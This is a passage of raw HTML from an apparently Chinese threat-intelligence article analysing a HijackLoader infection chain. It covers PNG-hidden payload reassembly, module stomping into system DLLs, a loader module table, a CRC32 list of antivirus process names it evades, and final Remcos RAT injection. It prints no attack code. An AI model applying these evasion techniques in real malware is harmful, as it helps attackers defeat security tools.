37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">这种手段使恶意代码运行在合法模块的内存空间内，利用系统文件的合法路径掩盖其真实属性，极大地增加了内存扫描工具的检测难度。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">2.5. 载荷组装与第二次注入</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">驻留在evr.dll中的恶意Shellcode读取并解密数据文件Jabveak.qafy,利用内置的PNG格式解析逻辑，在数据流中遍历并定位符合特定特征签名的IDAT数据块。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;text-align: center;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100024099" data-ratio="0.7364161849710983" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=ac35547e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PotKia6NicZdwJRosLOk5XkJDkSXwBoTuKre1CpfL0QjIYrROxTUVLlGggezwYSvxHqYUlTC2Gvo5YA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">为了还原载荷，Shellcode申请一段具有PAGE_EXECUTE_READWRITE(RWX)属性的内存空间，将分散在各个IDAT块中的数据片段提取出来并进行重组。数据拼接完成后，代码利用嵌入在数据头部的密钥执行XOR解密算法，在内存中还原出完整的攻击载荷。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100024100" data-ratio="0.7687861271676301" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=60c991bd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PotKia6NicZdwJRosLOk5XkJDaKibnt25T0ZxgdsR7THU43GnkCLsu1WCCYKtN3AnlaXCoXwVhpfI3SQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">解密后的数据不仅包含HijackLoader，还包含关键的配置信息，指定了下一阶段的注入策略，包括目标文件路径、宿主文件名、以及各个功能模块的名称与运行参数。依据此配置，恶意代码再次实施 Module Stomping 攻击，将提取出的载荷覆写到合法系统模块rasapi32.dll的内存空间中。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;text-align: center;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100024101" data-ratio="1.0312138728323699" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=ac0c7b9d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PotKia6NicZdwJRosLOk5XkJDo7MjiaTwgmt6DJ9RkXY9u8a3Ic3keSTSVubkVKGumDw3X2Wno0ehaeA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;text-align: center;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100024102" data-ratio="0.4728323699421965" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=2bed43af&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PotKia6NicZdwJRosLOk5XkJDpMHOvJqLDxRaZaHmiaDnM6ejevEKlggYxsIZInQzibkfWhwEnZfHnjLw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><strong style="color: rgb(190, 25, 31);font-size: 17px;letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="">2.6. </span><span leaf="">HijackLoader</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">HijackLoader[2]功能模块</span></span></p><table><tbody><tr><td data-colwidth="287"><p style="text-align: center;"><span leaf="">模块名称</span></p></td><td data-colwidth="287"><p style="text-align: center;"><span leaf="">模块功能</span></p></td></tr><tr><td data-colwidth="287"><p><span leaf=""><span textstyle="" style="font-size: 15px;">AVDATA</span></span></p></td><td data-colwidth="287"><p><span leaf="">反病毒软件进程名称黑名单</span></p></td></tr><tr><td data-colwidth="287"><p><span leaf=""><span textstyle="" style="font-size: 15px;">ESAL/ESAL64</span></span></p></td><td data-colwidth="287"><p><span leaf="">执行最后的Payload</span></p></td></tr><tr><td data-colwidth="287"><p><span leaf="">ESLDR/ESLDR64</span></p></td><td data-colwidth="287"><p><span leaf="">辅助注入HijackLoader相关的 shellcode</span></p></td></tr><tr><td data-colwidth="287"><p><span leaf="">ESWR/ESWR64</span></p></td><td data-colwidth="287"><p><span leaf="">清除shellcode，并执行rshell模块</span></p></td></tr><tr><td data-colwidth="287"><p><span leaf="">FIXED</span></p></td><td data-colwidth="287"><p><span leaf="">用于进程注入的合法可执行文件</span></p></td></tr><tr><td data-colwidth="287"><p><span leaf="">LauncherLdr64</span></p></td><td data-colwidth="287"><p><span leaf="">解密HijackLoader PNG文件提取模块</span></p></td></tr><tr><td data-colwidth="287"><p><span leaf="">modCreateProcess/modCreateProcess64</span></p></td><td data-colwidth="287"><p><span leaf="">创建子进程</span></p></td></tr><tr><td data-colwidth="287"><p><span leaf="">modTask/modTask64</span></p></td><td data-colwidth="287"><p><span leaf="">创建计划任务</span></p></td></tr><tr><td data-colwidth="287"><p><span leaf="">modUAC/modUAC64</span></p></td><td data-colwidth="287"><p><span leaf="">UAC提取模块</span></p></td></tr><tr><td data-colwidth="287"><p><span leaf="">modWD/modWD64</span></p></td><td data-colwidth="287"><p><span leaf="">禁用Defender</span></p></td></tr><tr><td data-colwidth="287"><p><span leaf="">modWriteFile/modWriteFile64</span></p></td><td data-colwidth="287"><p><span leaf="">文件写入模块</span></p></td></tr><tr><td data-colwidth="287"><p><span leaf="">rshell/rshell64</span></p></td><td data-colwidth="287"><p><span leaf="">重定位、解析并执行最终有效载荷</span></p></td></tr><tr><td data-colwidth="287"><p><span leaf="">ti/ti64</span></p></td><td data-colwidth="287"><p><span leaf="">执行第一阶段后代码注入</span></p></td></tr><tr><td data-colwidth="287"><p><span leaf="">TinycallProxy/TinycallProxy64</span></p></td><td data-colwidth="287"><p><span leaf="">间接进行函数调用，对抗栈回溯</span></p></td></tr><tr><td data-colwidth="287"><p><span leaf="">tinystub/tinystub64</span></p></td><td data-colwidth="287"><p><span leaf="">辅助注入rshell以规避检测</span></p></td></tr><tr><td data-colwidth="287"><p><span leaf="">tinyutilitymodule/tinyutilitymodule64</span></p></td><td data-colwidth="287"><p><span leaf="">用空字节覆盖指定文件的PE Header</span></p></td></tr><tr><td data-colwidth="287"><p><span leaf="">SM</span></p></td><td data-colwidth="287"><p><span leaf="">指定TinycallProxy在对抗栈回溯时用于伪装调用地址的DLL</span></p></td></tr><tr><td data-colwidth="287"><p><span leaf="">COPYLIST</span></p></td><td data-colwidth="287"><p><span leaf="">文件配置清单</span></p></td></tr><tr><td data-colwidth="287"><p><span leaf="">CUSTOMINJECT</span></p></td><td data-colwidth="287"><p><span leaf="">投递最终载荷时被注入的程序</span></p></td></tr><tr><td data-colwidth="287"><p><span leaf="">CUSTOMINJECTPATH</span></p></td><td data-colwidth="287"><p><span leaf="">存放CUSTOMINJECT的路径</span></p></td></tr><tr><td data-colwidth="287"><p><span leaf="">X64L</span></p></td><td data-colwidth="287"><p><span leaf="">架构转换</span></p></td></tr><tr><td data-colwidth="287"><p><span leaf="">PERSDATA</span></p></td><td data-colwidth="287"><p><span leaf="">持久化配置</span></p></td></tr></tbody></table><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">HijackLoader的AVDATA模块通过计算进程名的CRC32哈希值进行环境侦察，以识别并规避主流安全软件。</span></span></p><table style="width:575px;"><tbody><tr><td data-colwidth="137"><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-weight: normal;">CRC32</span></span></p></td><td data-colwidth="247"><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-weight: normal;">PRODUCT NAME</span></span></p></td><td data-colwidth="191"><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-weight: normal;">PROCESS NAME</span></span></p></td></tr><tr><td data-colwidth="137"><p><span leaf="">0x40CB21D3</span></p></td><td data-colwidth="247"><p><span leaf="">Kaspersky AntiVirus</span></p></td><td data-colwidth="191"><p><span leaf="">avp.exe</span></p></td></tr><tr><td data-colwidth="137"><p><span leaf="">0xB02EF94</span></p></td><td data-colwidth="247"><p><span leaf="">Avast Antivirus </span></p></td><td data-colwidth="191"><p><span leaf="">avastsvc.exe</span></p></td></tr><tr><td data-colwidth="137"><p><span leaf="">0x27873423</span></p></td><td data-colwidth="247"><p><span leaf="">/</span></p></td><td data-colwidth="191"><p><span leaf="">/</span></p></td></tr><tr><td data-colwidth="137"><p><span leaf="">0x19E8FAD2</span></p></td><td data-colwidth="247"><p><span leaf="">BitDefender Antivirus</span></p></td><td data-colwidth="191"><p><span leaf="">bdagent.exe</span></p></td></tr><tr><td data-colwidth="137"><p><span leaf="">0x8E9E8ADD</span></p></td><td data-colwidth="247"><p><span leaf="">AVG Internet Security</span></p></td><td data-colwidth="191"><p><span leaf="">avgsvc.exe</span></p></td></tr><tr><td data-colwidth="137"><p><span leaf="">0xD5345E50</span></p></td><td data-colwidth="247"><p><span leaf="">Emsisoft Anti-Malware</span></p></td><td data-colwidth="191"><p><span leaf="">a2service.exe</span></p></td></tr><tr><td data-colwidth="137"><p><span leaf="">0x456B109F</span></p></td><td data-colwidth="247"><p><span leaf="">Webroot SecureAnywhere</span></p></td><td data-colwidth="191"><p><span leaf="">wrsa.exe</span></p></td></tr><tr><td data-colwidth="137"><p><span leaf="">0xF868B2F1</span></p></td><td data-colwidth="247"><p><span leaf="">Windows Defender</span></p></td><td data-colwidth="191"><p><span leaf="">mspeng.exe</span></p></td></tr></tbody></table><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">TinycallProxy模块利用“调用栈伪造”技术，在执行敏感操作时，修改内存栈帧，将函数调用伪装成CDWizard.dll的地址。从而欺骗安全软件的栈回溯检查，使恶意行为看起来像是该DLL的正常业务逻辑流。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;text-align: center;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024103" class="rich_pages wxw-img" data-ratio="0.8323699421965318" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=e58e57b0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PotKia6NicZdwJRosLOk5XkJD64BSfUEeicbGQwkyFdrt8IQKTCfp593ctVh4p4TPOkiaZLXrzGa9Ybmg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">利用Windows计划任务实现持久化。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;text-align: center;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024104" class="rich_pages wxw-img" data-ratio="0.12023121387283237" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=b1c66ce7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PotKia6NicZdwJRosLOk5XkJDASYAXysteYOltjCUOnnLnrgS1P9gWxulnwlArCDXFsBKTPpA5WPhqw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">HijackLoader使用环境变量在不同加载阶段之间传递关键配置信息。为了规避静态特征检测，环境变量的名称并非硬编码，而是基于受害主机的NetBIOS计算机名动态生成。使得每一次感染生成的变量名都具有唯一性，增加检测难度。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;text-align: center;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024105" class="rich_pages wxw-img" data-ratio="0.14566473988439307" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=8d90d379&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PotKia6NicZdwJRosLOk5XkJDic0PktVPVRMAmybmNd6qp2nM6AXQsnsrrL3WXuw04c8SuzpFWd8Ve6A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><strong style="color: rgb(190, 25, 31);font-size: 17px;letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="">2.7. Remcos</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">HijackLoader最终将Payload注入到合法程序Chime.exe中，以隐蔽执行核心远控木马Remcos RAT。Remcos是一款经常被滥用的合法远程管理工具，具备远程管理、载荷执行、屏幕监控、持久化和信息窃取等多种功能。尽管该工具在市场上被标榜为合法的系统管理软件，但因其强大的侵入性功能，常被各类恶意攻击者滥用于网络间谍和数据窃取活动。运行后的Remcos Implant会主动连接攻击者的C2服务器以接收指令。攻击者通过Remcos提供的图形用户界面(GUI)控制面板，能够对受害主机进行批量自动化管理，或进行精准的手动交互操作。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;text-align: center;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024106" class="rich_pages wxw-img" data-ratio="0.2508670520231214" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=6105ae0b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PotKia6NicZdwJRosLOk5XkJDRW7Bia2KNM1EmSleIkV862gt4qcAhgNdwia7VWBicuxZniciaCLGLqR8viaA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);font-size: 18px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"> 三、归属研判 </span></span></strong></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">1.  本次攻击使用的诱饵文件名（如 